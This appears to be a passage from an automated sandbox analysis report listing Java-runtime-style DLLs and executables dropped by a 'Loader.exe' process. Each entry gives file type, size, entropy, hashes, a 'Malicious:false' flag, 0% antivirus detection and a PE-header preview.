                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~fQ.~fQ.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQ.~gQ.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQRich.~fQ................PE..L....PjW...........!.........................0.....o.........................p.......8....@..........................8......43..P....P...............2..@....`.......1..............................P1..@............0.......2..@....................text............................... ..`.rdata..T....0......................@..@.data........@.......&..............@....rsrc........P.......*..............@..@.reloc..J....`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):186944
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.612459610032652
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:XsSFQQB7SGWV2xrkvql6QPJD7mGVqjLypDTaDE5zwmFxy7HglbZrdIG:XJ97PxYAPJ/RV0tDCzw+xy0ldOG
                                                                                                                                                                                                                                                                                                              MD5:E9373908186D0DA1F9EAD4D1FDAD474B
                                                                                                                                                                                                                                                                                                              SHA1:C835A6B2E833A0743B1E8F6F947CFE5625FE791F
                                                                                                                                                                                                                                                                                                              SHA-256:E2FBD6C6334D4765FF8DFF5C5FE3DF8B50015D0BF9124142748FADB987B492FF
                                                                                                                                                                                                                                                                                                              SHA-512:BFDC236D462DAC45FD63C112E40558ED4E11E76FB4D713926A679FD573F67FA16451231A03178926B76BD267F092A33A3B6760CF4812DE2679BB9505B83F8261
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.+.#.x.#.x.#.x.mGx.#.x..Ax.#.x..ux3#.x.[Lx.#.x.[\x.#.x.#.x #.x.Utx.#.x..tx.#.x..Dx.#.x..Ex.#.x..Bx.#.xRich.#.x................PE..L....PjW...........!................K........ .....o................................,j....@................................. ...d.......................@............"...............................f..@............ ..P...L|.......................text...\........................... ..`.rdata...m... ...n..................@..@.data....5...........z..............@....rsrc...............................@..@.reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):145984
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.69725055196282
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:S2yRKm4/j/dKLnjHy7OMD+MqS1RYio7+oD33GnUV0fem2M:S2ytqlYnjHehDzqiq+oD33OUV8Vx
                                                                                                                                                                                                                                                                                                              MD5:4294D39CC9E5F23754D41B9DDE710112
                                                                                                                                                                                                                                                                                                              SHA1:1BAA1E136F18108AB4E31EC005DEC54FC3F23A7C
                                                                                                                                                                                                                                                                                                              SHA-256:DE3EEDED01B35DC7C29B0B758211BB1DB73CCFFB9298D281DAF56924ED9E93CB
                                                                                                                                                                                                                                                                                                              SHA-512:E88DFF129DD35445B32A2DBCAB97CF752E9ACDF82FF88B184FA6D3B461D55BD2D195794802C5BA5E7EFFA086DC89E0C2CEF0C8B0BFA29AC70B75CFB1B4B0584C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:.j.i.j.i.j.i..5i.j.i..8i.j.i...i.j.i..:i.j.i.j.i.j.i...i.j.i..=i.j.i..<i.j.i..;i.j.iRich.j.i................PE..L....PjW...........!.........P......)..............o.........................`............@.........................."..X.......P....@..............."..@....P..........................................@............................................text...N........................... ..`.rdata...9.......:..................@..@.data........0......................@....rsrc........@......................@..@.reloc..4....P......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16448
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.482296988184946
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:n11I27Bf0jeZy+hiqEyRoPV527rBnYPLr7/U:nrJfYqodYJC78
                                                                                                                                                                                                                                                                                                              MD5:4BDF31D370F8A893A22820A3B291CC1D
                                                                                                                                                                                                                                                                                                              SHA1:BD27656B42F881EEE1940CFE15CF84C1938B57BA
                                                                                                                                                                                                                                                                                                              SHA-256:C98DFAC99CC1E05D5F86B2577031A7624DCC13D0A8344B2855F166335177BC16
                                                                                                                                                                                                                                                                                                              SHA-512:51623274C13DA71AD01DBAD7950444B512F08C3DC04E27F0321DF02E9F3C4DFB308DEF35F58524CCCCE79ED2A8859D85C16DC0D9BEA378E5538E23602D35AA76
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.m..d>..d>..d>.b.>..d>...>..d>..e>..d>...>..d>...>..d>...>..d>...>..d>...>..d>...>..d>Rich..d>........................PE..L....PjW...........!.........................0.....o.........................p......n.....@.........................P8..:....4..<....P...............(..@....`.......0...............................3..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):30784
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.609051738644882
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:mk87qhVj8sqgP7CRLMOPfkGo7UdJs0flkg2uG8RPGHTR5ny5pnYPLr7z:mk87qhVjaMOPJdJFflLJR+V03C7z
                                                                                                                                                                                                                                                                                                              MD5:7BD914407C6D236B27865A8C63147B7F
                                                                                                                                                                                                                                                                                                              SHA1:9B49E48705341D30E3F92B85652E924C7985E415
                                                                                                                                                                                                                                                                                                              SHA-256:549849DC910261D817670B192715430395993E811D0FD3103651237D7F18929D
                                                                                                                                                                                                                                                                                                              SHA-512:624DC95F696BEA311726EAFB0017F363C8703B95A2E08DE984C642867888CF5B9172326C2E2567ED4A2EA28F806B633840552C80BE49EB6CF2A8FC4A0C259117
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Nu.h &.h &.h &...&.h &...&.h &...&.h &.h!&_h &...&.h &...&.h &...&.h &...&.h &...&.h &Rich.h &........PE..L....PjW...........!.....8...(.......A.......P.....o.................................G....@.........................P^.......V..P....................`..@...........`Q...............................U..@............P..D............................text...66.......8.................. ..`.rdata.. ....P.......<..............@..@.data...$....p.......V..............@....rsrc................X..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):27712
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6264206752006825
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:hgWe1DWI+mB7JkJKe3xVF2XNbuHEqe8yIGn3zY9pcQ/oGmEsg0sqkgiHmNs2Qd6X:qWbEK1Ms2dYJG
                                                                                                                                                                                                                                                                                                              MD5:6280201C1918EA3293919BB282D2B563
                                                                                                                                                                                                                                                                                                              SHA1:3F6F5299A435E2A0C36BE8AAD4CB2FCAACD0897D
                                                                                                                                                                                                                                                                                                              SHA-256:0711127A297E4CC1927D77013FC040CAA26930C34A4C7B4D7631BCE9C8041B74
                                                                                                                                                                                                                                                                                                              SHA-512:A4C4507ED4FDEC038FAFA62970161E7B75FF9A2ABBDF854ED55483144DCDC0FC9D21235FDDDF1B38303723F9C615AE388397C4D17B5391D8827A5B40AC52C5FC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q...q...q.......q.......q.......q...q...q....=..q....<..q.......q.......q.......q..Rich.q..........................PE..L....PjW...........!.....6...$.......?.......P.....o................................p;....@.........................0Y.......S.......p...............T..@.......0....Q...............................R..@............P...............................text...f4.......6.................. ..`.rdata.......P.......:..............@..@.data...L....`.......J..............@....rsrc........p.......L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):178240
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.793245389378621
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:gWosiKTxga2KtpdhEnGF5PNyR0BxDxxKF5HkEWnuYsauj9Fom1QB:3RRKAtpdhEn/0BzwFpvYm0z
                                                                                                                                                                                                                                                                                                              MD5:BF299F73480AF97A750492E043D1FADD
                                                                                                                                                                                                                                                                                                              SHA1:C93C4A2DAE812F31603E42D70711D3B6822F9E8E
                                                                                                                                                                                                                                                                                                              SHA-256:0334E3B7AE677116B92516172D0CA905723DAF847D8B3B0DC3FC118EDC703D51
                                                                                                                                                                                                                                                                                                              SHA-512:7265783F0DD653DBC4693D5EFEB156281620C5421F29910F14C22B75A936233E9E897087E64B641335795484837F28F113EE9F380027698A898F19115FD0F648
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..di..di..di.k.i..di.k.i..di...i..di.k.i..di..ei..di.k.i..di.k.i..di.k.i..di.k.i..diRich..di................PE..L...pPjW...........!.....^...F.......g.......p.....o.................................Z....@.............................d....x..P.......h...............@....... ...`q..............................pw..@............p..H............................text....\.......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....rsrc...h...........................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.474237923131844
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gps45cnQ6DmSHhV8r0eeU4Szi6nYPLr70aG:Gpsnn4S/8rxeUvC7RG
                                                                                                                                                                                                                                                                                                              MD5:9A4CF09834F086568DF469E3F670BF07
                                                                                                                                                                                                                                                                                                              SHA1:594C4E0394475A6299C79E3A063C7D5AE49635F3
                                                                                                                                                                                                                                                                                                              SHA-256:709E9E544434C52285A72F29AD6B99CE1E7668545F10AD385C87ABF34D2052BB
                                                                                                                                                                                                                                                                                                              SHA-512:CD551E7944461F3288B880B9D161F19F97EB4599A3A46CC93C4172B5112960FB0C040B9996F13CF0761FB85A283E2F20944135EC59660C807A59B29CDDC44586
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......@....@.................................4#..P....@..T............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...T....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.477340414037824
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gps45cnk6LlmSHhV8i+ceek4SzS+nYPLr7wd:Gpsnn5AS/8jZek7C7wd
                                                                                                                                                                                                                                                                                                              MD5:4DE6BFE6EA98BC42A5358ED8307107B2
                                                                                                                                                                                                                                                                                                              SHA1:8F687E60784FD9046A361DC1DC85D43051CBD577
                                                                                                                                                                                                                                                                                                              SHA-256:7C07D167AA4A23AB64A205301663C87E578FF6B31985DF8B51AF80CA6999176F
                                                                                                                                                                                                                                                                                                              SHA-512:8091AADEACAD1DAC5191EBB996D1E4BE25A19C10A4E76F79AB7EA2A592711FD39AAD7E89D7DEE09385296AA7A649AABFA7C325C4A627AFE1C009C906709EDB5A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`............@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.477747126356611
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GpsJ5cn66FmSHhV8Teeek4SzSgnYPLr7mpB:GpsUngS/8TDekdC7yB
                                                                                                                                                                                                                                                                                                              MD5:CA17B8CBD623477C5D1D334B79890225
                                                                                                                                                                                                                                                                                                              SHA1:2BFC372A28EDE40093286CDA45003951A2CE424F
                                                                                                                                                                                                                                                                                                              SHA-256:A7AC47AC8518E2D53575E12521B3A766A5E2EE4133C6C6AB9AE1C3C6777F5E77
                                                                                                                                                                                                                                                                                                              SHA-512:D9DDF3E67B9A4E0197D271243623D4DF8A26A35EC2F5195AB316E910E133BA09C70F6D28E7CA69184E4ABABCF063C014D7A6E6EA48F82382B316864A945175C5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`....... ....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.476844183458217
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gpsw5cnL6U0mSHhV89+ee84SzSFnYPLr7KTdK:Gps/nHpS/89je80C7KQ
                                                                                                                                                                                                                                                                                                              MD5:B4AD335E868693F009B7644E2ED555C1
                                                                                                                                                                                                                                                                                                              SHA1:ECCB9711CF78BCD5BD78231A838B1852764B301C
                                                                                                                                                                                                                                                                                                              SHA-256:CCA46A54A1A9CE78F7FFC49D195C4AB970AD540B5FCB2B6D9BF57EEDF38EC28D
                                                                                                                                                                                                                                                                                                              SHA-512:04A4670345B47C5B256220A85FFC68A1DD6DFE8D44838A4C634EB0EBC469EFC307B0BCF838AA1244634A315F365518B1633586B872C6D459EE80374D14234CA4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......{.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):185920
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.517453559791758
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:pmxoFzYbnERrNyf0VCyqp2pswAG8wJfV1cnrQKUCc9rBTq/bKQcUMZ:koFJcQCyuZG8wdKcLgbDcU6
                                                                                                                                                                                                                                                                                                              MD5:D4246AF96E1FFA5E63C55E6F0A63ED82
                                                                                                                                                                                                                                                                                                              SHA1:30F319CEBD7BCCCFC3637231D07F45BD5A79B03E
                                                                                                                                                                                                                                                                                                              SHA-256:84576AAC88D08E864645415D8A81F4B8F04C881B7624973C952BA6BCB94F4C8C
                                                                                                                                                                                                                                                                                                              SHA-512:92EDFE62BE5BDDC47EC51B01F8FE71C69691423ABECBB358A972766ACCDC8F9365C064FD0A7833C8853EDD5DED51791A7662584DB5F54BE3586AC2787160FA6A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......AE.m.$z>.$z>.$z>.\.>.$z>...>.$z>...>.$z>...>.$z>.${>T$z>...>"$z>...>.$z>...>.$z>...>.$z>Rich.$z>........................PE..L...pPjW...........!.................%.......0.....o......................................@..........................P..h...LK..d.......................@.......$... 1...............................I..@............0...............................text............................... ..`.rdata..H#...0...$... ..............@..@.data....h...`...\...D..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33344
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.5580840927675945
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:5TuVpsEkV3/azbYJHf2ZdCwhxKdv0tCFC7dRb:5YQV3/az8x2HCSScC4dRb
                                                                                                                                                                                                                                                                                                              MD5:EFF31A13A4A5D3E9A5BD36E7349D028B
                                                                                                                                                                                                                                                                                                              SHA1:8E47BE8C1CE4DFD73B7041679E96EA4A17DDB4C0
                                                                                                                                                                                                                                                                                                              SHA-256:307B816892FDD9BAD9E28953E1BBB4BCE35C8F8CA783C369D7EB52A22BCC4229
                                                                                                                                                                                                                                                                                                              SHA-512:72148C757624868D3866C40B31149CCA171737D82ADBCDF2C8FB03A9D8F3C1CEA2B2FC5137DD11DAAD2328D3AF8FAE43568DCCD843664BC43323F9357B67B6A0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\j.29.29.29w..9.29...9.29...9.29..9.29...9.29.39..29...9..29...9.29...9.29...9.29Rich.29........PE..L...pPjW...........!.....,...>......H6.......@.....o................................T.....@..........................T.......K.......................j..@...........pA..............................XJ..@............@..P............................text...^+.......,.................. ..`.rdata...-...@.......0..............@..@.data...@....p.......^..............@....rsrc................`..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):574528
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.508068830472597
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:NtKMEr1LBBgPcvhwhtRtL+tKJZetu4zxLukaMevlOjPMat4+8NMutQaLqqiINw3X:NtKMEr1VBgPcvhwhtRtL+tkZezxLuQeS
                                                                                                                                                                                                                                                                                                              MD5:5E1B7D0ACCB4275DEAB6312AA246CB3E
                                                                                                                                                                                                                                                                                                              SHA1:488A5CB9D9C0CF27824DF32B9B76D4F67F6FB485
                                                                                                                                                                                                                                                                                                              SHA-256:9FC49B3F6FD11A2B2B92748C24F21721D1011B1920D092E38AF4021102125543
                                                                                                                                                                                                                                                                                                              SHA-512:5A875DD4731E862F753EBB987593DC61D39DD3D3D13CDED284DE27DD09AFA946FA96824AC194EC0DD45AA2CE0D56637A5522F49F28F3C89B7F5248D389B1B62E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y...8i.8i.8i.@..8i....8i.8h.8i....8i....8i.....8i....8i....8i....8i.Rich.8i.........PE..L...pPjW...........!...............................o.....................................@......................... ..."......<.......................@...........................................p...@............................................text............................... ..`.rdata..B...........................@..@.data...,...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):455328
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.698367093574994
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                                                                                                                              MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                                                                                                                              SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                                                                                                                              SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                                                                                                                              SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
